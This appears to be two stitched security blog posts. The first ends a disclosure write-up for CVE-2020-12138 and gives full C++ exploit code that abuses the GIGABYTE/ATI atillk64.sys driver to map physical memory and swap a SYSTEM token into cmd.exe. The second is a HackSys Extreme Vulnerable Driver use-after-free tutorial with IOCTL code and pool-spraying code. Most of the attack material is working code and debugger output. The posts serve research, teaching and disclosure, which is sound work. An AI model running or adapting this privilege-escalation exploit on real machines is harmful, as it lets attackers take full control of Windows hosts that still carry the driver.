Searching for 100 process allocations in the pool is somewhat aggressive. The program will exit if it doesn’t find this many before bumping into the hard cap. Keep in mind that it doesn’t start parsing for the EPROCESS data until it has collected 100 “Proc” tag locations. This could mean that the program exits having already identified the relevant process chunks needed to elevate privileges.

This number can be toned down and the exploit could be trivially tweaked to search very small sections of physical memory at a time before exiting, annotating along the way and printing any valuable EPROCESS structure information to the terminal as it progresses. It could for instance be tweaked to search n amount of physical memory, output the location and token values of any privileged process or the cmd.exe process, and then exit while specifying the last memory address that it mapped. You could then start the exploit up again but this time specify the new last memory address mapped and map n from there and repeat until you had everything you needed.

The hardest part was finding the cmd.exe process. Likely-to-be-SYSTEM processes were easy to find. If you have a remote-desktop/GUI equivalent access to the host machine, you could open a few cmd.exe processes and greatly improve your odds of finding one to overwrite and elevate privileges.

Even with just one cmd.exe process, I was able to find and overwrite my token roughly 90% of the time. With more than one, it was 100% in my testing.

There are some improvements that can be made to the exploit no doubt, but as is, it works really well in my testing and can be tweaked fairly easily. I believe it sufficiently proves the vulnerability.

Mandatory screenshot:

Huge Thanks

Huge thanks to @FuzzySecurity for all of the tutorials, I’ve recently also finished up his HEVD exploit tutorials and have learned a ton from his blog. Just an awesome resource.

Thanks to @HackSysTeam for the HackSysExtremeVulnerable driver, it has been such a great learning resource and got me started down this path.

Thanks to both @ihack4falafel and @ilove2pwn_ for answering all of my questions along the way or helping me find the answers myself. Very grateful.

Thanks to @TheColonial for his advice about disclosure and his awesome CAPCOM.SYS YouTube video series. I learned a lot of nice WinDBG tricks from this.

Thanks again to @jessemichael for being so helpful and charitable.

Thanks to Jackson T. for not only his blog post but for answering all my questions and being extremely helpful, really appreciate it.

And finally thanks to all those cited blog authors @rwfpl and @hatRiot.

All testing performed on Build 18362.19h1_release.190318-1202.

Please, let me know if you find any errors.

Disclosure Timeline

February 25th 2020 – Email, Customer Service Ticket, and Twitter DM sent to GIGABYTE USA
February 26th 2020 – Email sent to AMD psirt with notification of the vulnerability found and the PoC created
February 26th 2020 – Response from psirt to send PoC
February 26th 2020 – PoC sent to psirt
March 7th 2020 – Ask for update from psirt, no update given
March 16th 2020 – Ask for update from psirt
March 16th 2020 – psirt responds that the issue has been previously reported and that they don’t support the product as a result
March 16th 2020 – I inform psirt that other parties are still packaging and installing the driver and there is no advisory for the driver
March 24th 2020 – psirt states that support for the driver ended in late 2019 and to contact GIGABYTE directly
April 14th 2020 – No response from GIGABYTE USA, request CVE
April 24th 2020 – Assigned CVE-2020-12138, blog posted

Exploit Code

// CVE-2020-12138
// EOP Exploit POC for atillk64.sys by @h0mbre_
// C:\Program Files (x86)\GIGABYTE\RGBFusion\AtiTool\atillk64.sys
// Driver vulnerability referenced in: 
// https://github.com/eclypsium/Screwed-Drivers
// https://eclypsium.com/2019/08/10/screwed-drivers-signed-sealed-delivered/

#include <iostream>
#include <vector>
#include <algorithm>
#include <Windows.h>
#include "h0mbre.h"
using namespace std;

#define DEVICE_NAME         "\\\\.\\atillk64"
#define IOCTL               0x9C402564
#define START_ADDRESS       (INT64)0x200000000   // based off testing my VM
#define MAX_ADDRESS         (INT64)0x240000000   // based off testing my VM

// Creating vector of hex representation of ImageFileNames of common 
// SYSTEM processes, eg. 'wlms.exe' = hex('exe.smlw')
vector<INT64> SYSTEM_procs = {
    0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    0x6578652e73736d73,         // smss.exe
    0x7365636976726573,         // services.exe
    0x6b6f72426d726753,         // SgrmBroker.exe
    0x2e76736c6f6f7073,         // spoolsv.exe
    0x6e6f676f6c6e6977,         // winlogon.exe
    0x2e74696e696e6977,         // wininit.exe
    0x6578652e736d6c77,         // wlms.exe
};

// Creating struct for our input buffer to DeviceIoControl
typedef struct {
    INT64 start_address;
    DWORDLONG num_of_bytes;
    DWORDLONG padding;
} INPUT_BUFFER;

// This struct will hold the address of a "Proc" tag and that Proc chunk's 
// header size
struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

// Grabs handle to atillk64.sys
HANDLE get_handle(const char* device_name) {
    HANDLE hFile = CreateFileA(
        device_name,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        cout << "[!] Unable to grab handle to atillk64.sys.\n";
        exit(1);
    }
    else
    {
        string hex_output = pretty_hex((int)hFile);
        cout << "[>] Successfully grabbed handle to atillk64.sys: "
            << hex_output << "\n";

        return hFile;
    }
}

// Mapping memory from a physical address to our process virtual space
PROC_DATA map_memory(HANDLE device_handle) {

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    string hex_output = pretty_hex((int)output_buff);
    cout << "[>] Output buffer allocated at: " << hex_output << ".\n";

    DWORD bytes_returned = 0;

    PROC_DATA proc_data;

    // failures == unsuccessful DeviceIoControl calls
    int failures = 0;

    // How many legitimate "Proc" chunks we've found in memory as in
    // we've confirmed they have headers.
    int proc_count = 0;
    int iteration = 0;
    cout << "[>] Going fishing for 100 \"Proc\" chunks in RAM...\n\n";
    while (proc_count < 100)
    {
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = START_ADDRESS + (0x1000 * iteration);

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        if (input_buff.start_address > MAX_ADDRESS)
        {
            cout << "[!] Max address reached!\n";
            cout << "[!] Iterations: " << dec << iteration << "\n";
            exit(1);
        }
        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // The virtual address in our process space where RAM was mapped
            // is located in the first 8 bytes of our output_buff.
            INT64 mapped_address = *(PINT64)output_buff;

            // We will read a 32 bit value at offset i + 0x100 at some point
            // when looking for 0x00B80003, so we can't iterate any further
            // than offset 0xF00 here or we'll get an access violation.
            for (INT64 i = 0; i < (0xF10); i = i + 0x10)
            {
                INT64 test_address = mapped_address + i;
                INT32 test_value = *(PINT32)(test_address + 0x4);
                if (test_value == 0x636f7250)   // "Proc"
                {
                    for (INT64 x = 0; x < (0x100); x = x + 0x10)
                    {
                        INT64 header_address = test_address + x;
                        INT32 header_value = *(PINT32)header_address;
                        if (header_value == 0x00B80003) //  "Header" ending
                        {
                            // We found a "header", this is a legit "Proc"
                            proc_count++;

                            // This is the literal physical mem addr for the
                            // "Proc" pool tag
                            INT64 temp_addr = input_buff.start_address + i;

                            // This address might not be page-aligned to 0x1000
                            // so find out how far off from a multiple of 
                            // 0x1000 we are. This value is stored in our 
                            // PROC_DATA struct in the page_entry_offset
                            // member.
                            INT64 modulus = temp_addr % 0x1000;
                            proc_data.page_entry_offset.push_back(modulus);

                            // This is the page-aligned address where, either
                            // small or large paged memory will hold our "Proc"
                            // chunk. We store this as our proc_address member
                            // in PROC_DATA.
                            INT64 page_address = temp_addr - modulus;
                            proc_data.proc_address.push_back(
                                page_address);
                            proc_data.header_size.push_back(x);
                        }
                    }
                }
            }
            iteration++;
        }
        else
        {
            // DeviceIoControl failed
            iteration++;
            failures++;
        }
    }
    cout << "[>] \"Proc\" chunks found\n";
    cout << "    - Failed DeviceIoControl calls: " << dec << failures << "\n";
    cout << "    - Total DeviceIoControl calls: " << dec << iteration << "\n\n";

    // Returns struct of three vectors: the page-aligned address of each Proc
    // chunk, its offset within that page, and its header size.
    return proc_data;
}

void parse_procs(HANDLE device_handle, struct PROC_DATA proc_data) {

    INT64 SYSTEM_token = 0;
    INT64 cmd_token_addr = 0;
    bool SYSTEM_found = false;

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    for (int i = 0; i < proc_data.proc_address.size(); i++)
    {
        // We need to map 0x1000 bytes from our "Proc" tag so that we can parse
        // out all the EPROCESS members we're interested in. The deepest member
        // is ImageFileName at offset 0x450 from the end of the header. Header
        // sizes varied from 0x20 to 0x90 in my testing. start_address will be
        // the address of the beginning of each 0x1000 aligned address closest
        // to the "Proc" tag we found.
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = proc_data.proc_address[i];

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        DWORD bytes_returned = 0;

        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // Pointer to the beginning of our process space with the mapped
            // 0x1000 bytes of physmem
            INT64 mapped_address = *(PINT64)output_buff;

            // mapped_address is mapping from our page entry where, on that
            // page, exists a "Proc" tag. Therefore, we need both the header
            // size and the offset from the page entry to the "Proc" tag so
            // we can calculate the static offsets/values of the EPROCESS
            // members ImageFileName, Token, UniqueProcessId...
            INT64 imagename_address = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x450; //ImageFileName
            INT64 imagename_value = *(PINT64)imagename_address;

            INT64 proc_token_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x360; //Token
            INT64 proc_token = *(PINT64)proc_token_addr;

            INT64 pid_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x2e8; //UniqueProcessId
            INT64 pid_value = *(PINT64)pid_addr;

            // See if the ImageFileName 64 bit hex value is in our vector of
            // common SYSTEM processes
            int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
                imagename_value);
            if (sys_result != 0 and SYSTEM_found == false)
            {
                SYSTEM_token = proc_token;
                cout << "[>] SYSTEM process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
                SYSTEM_found = true;
            }
            else if (imagename_value == 0x6568737265776f70 or
                imagename_value == 0x6578652e646d63)  // powershell or cmd
            {
                cmd_token_addr = proc_token_addr;
                cout << "[>] cmd.exe process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
            }
        }
        else
        {
            //DeviceIoControl failed
        }
    }
    if ((!cmd_token_addr) or (!SYSTEM_token))
    {
        cout << "[!] Token swapping requirements not met.\n";
        cout << "[!] Last physical address scanned: " << hex <<
            proc_data.proc_address.back() << ".\n";
        cout << "[!] Better luck next time!\n";
        exit(1);
    }
    else
    {
        *(PINT64)cmd_token_addr = SYSTEM_token;
        cout << "[>] SYSTEM and cmd.exe token info found, swapping tokens...\n";
        exit(0);
    }
}

void ascii() {

    cout << "\n\n\t     CVE-2020-12138 Proof-of-Concept\n";
    cout << "\t   EOP in ATI Technologies atillk64.sys\n\n";
    cout << "\t\t\t       by @h0mbre_\n\n\n";
}

int main() {

    ascii();

    // Grab handle to our device driver atillk64.sys
    HANDLE hFile = get_handle(DEVICE_NAME);

    // Scan for "Proc" chunks; returns a PROC_DATA struct of vectors
    PROC_DATA proc_data = map_memory(hFile);

    // Look through our PROC_DATA struct for the values we need, ie EPROCESS
    // members for the processes we're interested in
    parse_procs(hFile, proc_data);
}
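The two magic constants compared against imagename_value in parse_procs are just the first 8 bytes of the process name read as a little-endian 64-bit integer. A minimal sketch of that packing follows; pack_image_name is a hypothetical helper, not part of the PoC, and it assumes the name is plain ASCII.

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>

// Hypothetical helper (not in the original PoC): pack the first 8 bytes of a
// process name the way a little-endian 8-byte read of ImageFileName sees them.
// Names shorter than 8 bytes are zero-padded, longer names are truncated.
std::uint64_t pack_image_name(const std::string& name) {
    assert(!name.empty() && "expected a non-empty image name");
    const std::size_t len = std::min<std::size_t>(name.size(), 8);
    std::uint64_t value = 0;
    for (std::size_t i = 0; i < len; ++i) {
        // Byte i of the string lands in bits [8*i, 8*i + 7] of the value.
        const auto byte = static_cast<unsigned char>(name[i]);
        value |= static_cast<std::uint64_t>(byte) << (8 * i);
    }
    return value;
}
```

With this, pack_image_name("cmd.exe") gives 0x6578652e646d63 and pack_image_name("powershell.exe") gives 0x6568737265776f70, the two values hard-coded in the comparison above. The same helper could be used to build the SYSTEM_procs vector instead of writing the hex values by hand.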

HEVD Exploits – Windows 7 x86 Use-After-Free

The Human Machine Interface

By: h0mbre

23 April 2020 at 04:00

Introduction

Continuing on with my goal to develop exploits for the HackSys Extreme Vulnerable Driver, I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from the strategies I saw employed in those blog posts, either out of necessity or because I was trying to do my own thing to learn more.

This series will be light on tangential information such as:

how drivers work, the different types, communication between userland, the kernel, and drivers, etc
how to install HEVD,
how to set up a lab environment
shellcode analysis

The reason for this is simple: the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, so I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

To @r0oki7 for their walkthrough,
To @FuzzySec for their walkthrough,

UAF Setup

I’ve never exploited a use-after-free bug on any system before. I vaguely understood the concept before starting this exercise. We need what, in my noob opinion, seems like quite a lot of primitives in order to make this work. Obviously HEVD goes out of its way to be vulnerable in precisely the correct way for us to get an exploit working, which is perfect for me since I have no experience with this bug class and we’re just here to learn. Although we have to utilize multiple functions via IOCTL, I feel like this is actually a simpler exploit to pull off than the pool overflow that we just did.

Also, I wanted to do this on 64 bit; however, most of the strategies I saw outlined required that we use NtQuerySystemInformation, which as far as I know requires your process to be elevated to an extent so I wanted to avoid that. On 64 bit, the pool header structure size changes from 0x8 bytes to 0x10 bytes which makes exploitation more cumbersome; however, there are some good walkthroughs out there about how to accomplish this. For now, let’s stick to x86.

What do we need in order to exploit a use-after-free bug? Well, after doing this exercise, it seems like we need to be able to do the following:

allocate an object in the non-paged pool,
a mechanism that creates a reference to the object as a global variable, ie if our object is allocated at 0xFFFFFFFF, there is some variable out there in the program that is storing that address for later use,
the ability to free the memory and not have the previously established reference NULLed out, ie when the chunk is freed the program author doesn’t specify that the reference=NULL,
the ability to create “fake” objects that have the same size and controllable contents in the non-paged pool,
the ability to spray the non-paged pool and create perfectly sized holes so that our UAF and fake objects can be fitted in our created holes,
finally, the ability to use the no-longer valid reference to our freed chunk.
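The requirements above can be sketched entirely in userland with a toy model. Everything in this block is hypothetical and only mimics the shape of the bug: ToyPool is a fixed array of slots that hands back the lowest free slot (an assumption made to keep reuse deterministic, the real non-paged pool does not behave this simply), and g_toy_uaf_object stands in for the driver's global reference. Since the storage lives inside the array for the whole run, reading a "freed" slot here is well-defined C++, unlike a real dangling pointer.

```cpp
#include <array>
#include <cassert>
#include <cstddef>

using Callback = int (*)();

// Toy stand-in for the driver's object: a callback pointer followed by a buffer.
struct ToyObject {
    Callback callback;
    char buffer[0x54];
};

// Toy "pool": a fixed set of slots, lowest free slot is handed out first.
class ToyPool {
public:
    ToyObject* allocate() {
        for (std::size_t i = 0; i < slots_.size(); ++i) {
            if (!used_[i]) { used_[i] = true; return &slots_[i]; }
        }
        return nullptr;
    }
    void release(ToyObject* object) {
        const std::size_t index = static_cast<std::size_t>(object - slots_.data());
        assert(index < slots_.size() && used_[index]);
        used_[index] = false;  // slot is reusable, contents are left untouched
    }
private:
    std::array<ToyObject, 4> slots_{};
    std::array<bool, 4> used_{};
};

ToyObject* g_toy_uaf_object = nullptr;  // the stale global reference

int legit_callback() { return 0; }
int attacker_callback() { return 1337; }

void allocate_uaf_object(ToyPool& pool) {
    g_toy_uaf_object = pool.allocate();
    assert(g_toy_uaf_object != nullptr);
    g_toy_uaf_object->callback = legit_callback;
}

void free_uaf_object(ToyPool& pool) {
    pool.release(g_toy_uaf_object);
    // Bug being modeled: g_toy_uaf_object is NOT reset to nullptr here.
}

void allocate_fake_object(ToyPool& pool, Callback callback) {
    ToyObject* fake = pool.allocate();  // reuses the slot that was just released
    assert(fake != nullptr);
    fake->callback = callback;
}

int use_uaf_object() {
    if (g_toy_uaf_object != nullptr && g_toy_uaf_object->callback != nullptr) {
        return g_toy_uaf_object->callback();  // calls whatever now sits in the slot
    }
    return -1;
}

// Allocate, free, replace with a fake object, then use the stale reference.
int run_toy_scenario() {
    ToyPool pool;
    allocate_uaf_object(pool);
    free_uaf_object(pool);
    allocate_fake_object(pool, attacker_callback);
    return use_uaf_object();
}
```

In this model run_toy_scenario() ends up calling attacker_callback, because the stale global still points at the slot that the fake object reclaimed. The pool spray discussed later in the post exists to make that slot reuse reliable in the real non-paged pool.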

Allocating the UAF Object in the Pool

Let’s take a look at the UAF object allocation routine in the driver in IDA.

It may not be immediately clear what’s going on without stepping through the routine in the debugger but we actually have very little control over what is taking place here. I’ve created a small skeleton exploit code and set a breakpoint towards the start of the routine. Here is our code at the moment:

#include <iostream>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void create_UAF_object(HANDLE hFile) {

    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        ALLOCATE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);
}


int main() {

    HANDLE hFile = grab_handle();

    create_UAF_object(hFile);

    return 0;
}

You can see from the IDA screenshot that after the call to ExAllocatePoolWithTag, eax is placed in esi. This is about where I’ve placed the breakpoint. We can then take the value in esi, which should be a pointer to our allocation, and go see what the allocation will look like after the subsequent memset operation completes. We can see some static values as well, such as what appears to be the size of the allocation (0x58), which we know from our last post is actually undersold by 0x8 since we also have to account for the pool header, so our real allocation size in the pool is 0x60 bytes.
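The 0x58 to 0x60 arithmetic can be written down as a tiny helper. This is only a sketch: pool_chunk_size is a hypothetical name, and the rounding to an allocation granularity (8 bytes on x86) is an assumption that goes beyond the header-size detail mentioned in this post.

```cpp
#include <cassert>
#include <cstddef>

// Hypothetical helper: size a request occupies in the pool once the pool
// header is added and the total is rounded up to the allocation granularity.
// Assumes granularity is a non-zero power of two.
inline std::size_t pool_chunk_size(std::size_t request,
                                   std::size_t header_size,
                                   std::size_t granularity) {
    assert(granularity != 0 && (granularity & (granularity - 1)) == 0);
    const std::size_t total = request + header_size;
    return (total + granularity - 1) & ~(granularity - 1);
}
```

For the x86 case in this post, pool_chunk_size(0x58, 0x8, 0x8) gives 0x60. Plugging in a 0x10 byte header and 0x10 granularity gives 0x70 for the same request, which only illustrates how the larger 64 bit header changes the math and is not a measurement taken from an x64 HEVD build.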

So we hit our breakpoint after ExAllocatePoolWithTag and then I just stepped through until the memset completed.

Right after the memset completed, we look up our object in the pool and see that it’s mostly been filled with A characters, except for the first DWORD value, which has been left NULL. After stepping through the next two instructions:

We can see that the DWORD value has been filled and also that a null terminator has been added to the last byte of our allocation. This DWORD is the UaFObjectCallback which is a function pointer for a callback which gets used during a separate routine.

And lastly in the screenshot we can see that esi, which holds the location of our allocation, is moved into the global variable g_UseAfterFreeObject. This is important because this is what makes this code vulnerable, as this same variable will not be nulled out when the object is freed.

Freeing the UAF Object

Now, let’s try interacting with the driver routine which allows us to free our object.

Not a whole lot here, we can see though that there is no effort made to NULL the global variable g_UseAfterFreeObject. You can see that even after we run the routine, the variable still holds the value of our freed allocation address:

Allocating a Fake Object

Now let’s see how much freedom we have to allocate arbitrary objects in the non-paged pool. Looking at the function, it uses the same APIs we’re familiar with, does a probe for read to make sure the buffer is in user land (I think?), and then builds our chunk to our specifications.

I just sent a buffer of size 0x58 with all A characters for testing. It even appends a null-terminator to the end like the real UAF object allocator, but we control the contents of this one. This is good since we’ll have full control over the pointer value at the start of the chunk that serves as the callback function pointer.

Executing UAF Object Callback

This is where the “use” portion of “Use-After-Free” comes in. There is a driver routine that allows us to take the address which holds the callback function pointer of the UAF object and then call the function there. We can see this in IDA.

We can see that as long as the value at [eax], which holds the address of our UAF object (or what used to be our UAF object before we freed it) is not NULL, we’ll go ahead and call the function pointer stored at that location (the callback function). Right now, if we called this, what would happen? Let’s see!

Looking up the memory address of what was our freed chunk we see that it is NOT NULL. We would actually call something, but the address that would be called is 0x852c22f0. Looking at that address, we see that there is just arbitrary code there.

This is not what we want. We want this to be predictable just like our last exploit. We want the freed address of our UAF object to be filled with our fake object, so when the function pointer at that address is called, it will be a pointer we control, our shellcode. To do this, our plan of attack is very similar to our last post. Please go through that exploit first!

Spraying the Non-Paged Pool

First things first, we need an object that fits our needs. Last post we used Event Objects, but this time around, since we need 0x60 sized chunks, we’ll be using IoCompletionReserve objects which we can allocate with NtAllocateReserveObject (thanks blogpost authors).

We’ll do the same thing we did last time but spray some more. In my testing I found that I had to spray more to get the chunks sequential like we want:

defragment the pool with 10,000 objects
aim for some sequential/contiguous blocks of objects with another spray of 30,000 objects.

Next, we’ll want to poke holes in the contiguous block portion, remember? We’ll be collecting handles to these objects in vectors so that we can later free the ones we need to create the holes. The holes are already the perfect size, so we’ll just free every other contiguous block handle. That way, every hole that is created in our contiguous block will be surrounded on both sides by our objects. Let’s update our exploit code and test out the spray. Huge thanks to @tekwizz123 once again for showing in his exploit how to get NtAllocateReserveObject into the program; it would’ve taken me a long time to troubleshoot those compilation errors without his help. Our spray test code:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

vector<HANDLE> defrag_handles;
vector<HANDLE> sequential_handles;

typedef struct _LSA_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    UNICODE_STRING* ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;

#define POBJECT_ATTRIBUTES OBJECT_ATTRIBUTES*

typedef NTSTATUS(WINAPI* _NtAllocateReserveObject)(
    OUT PHANDLE hObject,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN DWORD ObjectType);

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void create_UAF_object(HANDLE hFile) {

    cout << "[>] Creating UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        ALLOCATE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not create UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] UAF object allocated.\n";
}

void free_UAF_object(HANDLE hFile) {

    cout << "[>] Freeing UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        FREE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not free UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] UAF object freed.\n";
}

void allocate_fake_object(HANDLE hFile) {

    cout << "[>] Creating fake UAF object...\n";
    BYTE input_buffer[0x58] = { 0 };

    memset((void*)input_buffer, '\x41', 0x58);

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        FAKE_OBJECT_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not create fake UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] Fake UAF object created.\n";
}

void spray() {

    // thanks Tekwizz as usual
    _NtAllocateReserveObject NtAllocateReserveObject = 
        (_NtAllocateReserveObject)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtAllocateReserveObject");

    if (!NtAllocateReserveObject) {

        cout << "[!] Failed to get the address of NtAllocateReserveObject.\n";
        cout << "[!] Last error " << GetLastError() << "\n";
        exit(1);
    }

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE hObject = 0x0;

        // NtAllocateReserveObject returns an NTSTATUS (0 on success), not a pointer
        NTSTATUS result = NtAllocateReserveObject(&hObject,
            NULL,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during defragmentation\n";
            exit(1);
        }
        defrag_handles.push_back(hObject);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 30000; i++) {

        HANDLE hObject = 0x0;

        // NtAllocateReserveObject returns an NTSTATUS (0 on success), not a pointer
        NTSTATUS result = NtAllocateReserveObject(&hObject,
            NULL,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during sequential spray\n";
            exit(1);
        }
        sequential_handles.push_back(hObject);
    }

    cout << "[>] Sequential spray complete.\n";

    cout << "[>] Poking 0x60 byte-sized holes in our sequential allocation...\n";
    for (int i = 0; i < sequential_handles.size(); i++) {
        if (i % 2 == 0) {
            BOOL freed = CloseHandle(sequential_handles[i]);
        }
    }
    cout << "[>] Holes poked lol.\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29997] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29998] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29999] << "\n";

    Sleep(1000);
    DebugBreak();
}

int main() {

    HANDLE hFile = grab_handle();

    //create_UAF_object(hFile);

    //free_UAF_object(hFile);

    //allocate_fake_object(hFile);

    spray();

    return 0;
}

We can see after running this and looking at one of the handles we dumped to the terminal (thanks FuzzySec!), we were able to get our pool looking the way we want. 0x60 byte chunks free surrounded by our IoCo objects.

kd> !handle 0x2724c

PROCESS 86974250  SessionId: 1  Cid: 1238    Peb: 7ffdf000  ParentCid: 1554
    DirBase: bf5d4fc0  ObjectTable: abb08b80  HandleCount: 25007.
    Image: HEVDUAF.exe

Handle table at 89f1f000 with 25007 entries in use

2724c: Object: 8543b6d0  GrantedAccess: 000f0003 Entry: 88415498
Object: 8543b6d0  Type: (84ff1a88) IoCompletionReserve
    ObjectHeader: 8543b6b8 (new version)
        HandleCount: 1  PointerCount: 1


kd> !pool 8543b6d0 
Pool page 8543b6d0 region is Nonpaged pool
 8543b000 size:   60 previous size:    0  (Allocated)  IoCo (Protected)
 8543b060 size:   38 previous size:   60  (Free)       `.C.
 8543b098 size:   20 previous size:   38  (Allocated)  ReTa
 8543b0b8 size:   28 previous size:   20  (Allocated)  FSro
 8543b0e0 size:  500 previous size:   28  (Free)       Io  
 8543b5e0 size:   60 previous size:  500  (Allocated)  IoCo (Protected)
 8543b640 size:   60 previous size:   60  (Free)       IoCo
*8543b6a0 size:   60 previous size:   60  (Allocated) *IoCo (Protected)
		Owning component : Unknown (update pooltag.txt)
 8543b700 size:   60 previous size:   60  (Free)       IoCo
 8543b760 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b7c0 size:   60 previous size:   60  (Free)       IoCo
 8543b820 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b880 size:   60 previous size:   60  (Free)       IoCo
 8543b8e0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b940 size:   60 previous size:   60  (Free)       IoCo
 8543b9a0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543ba00 size:   60 previous size:   60  (Free)       IoCo
 8543ba60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bac0 size:   60 previous size:   60  (Free)       IoCo
